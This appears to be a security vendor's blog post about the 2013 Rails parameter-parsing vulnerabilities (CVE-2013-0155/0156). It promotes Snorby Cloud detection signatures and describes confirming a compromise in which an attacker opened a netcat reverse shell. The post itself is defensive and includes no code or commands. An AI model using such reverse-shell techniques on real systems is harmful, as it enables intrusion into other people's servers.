These last few weeks have been rough on Rails developers. Over the past few weeks there have been several vulnerabilities involving the parsing of Rails parameters, with one leading to arbitrary code execution (CVE-2013-0155, and CVE-2013-0156). Our friend Postmodern, the creator of Ronin (an excellent ruby platform for vulnerability and exploit development), wrote a great blog post explaining vulnerabilities with working PoC code.
If you believe you have a vulnerable Rails application, please visit the Rails blog and follow their mitigation instructions.
To assist our users, the Snorby Cloud team has issued detection signatures to our customers for the vulnerabilities described in the CVEs. You can see these new rules (appended with [SC]) in the screenshot below.
The reason I love Snorby Cloud is not only does it show us the event notification, but also gives us the tools we need to confirm compromise. Let’s see how it works.
First we click into an interesting alert.
If we look at the flow data, we can see the attacker attempted to create a basic reverse shell using netcat.
We can confirm the box was compromised in two ways:
First, we can see network traffic for all of the attacker’s commands to the victim computer.
Second, we can also see that netcat with a shell listed on the victim computer’s process list
What I love about this is that we didn’t have to leave the Snorby Cloud UI a single time in order to pivot to all of these different data sources and successfully confirm a compromise.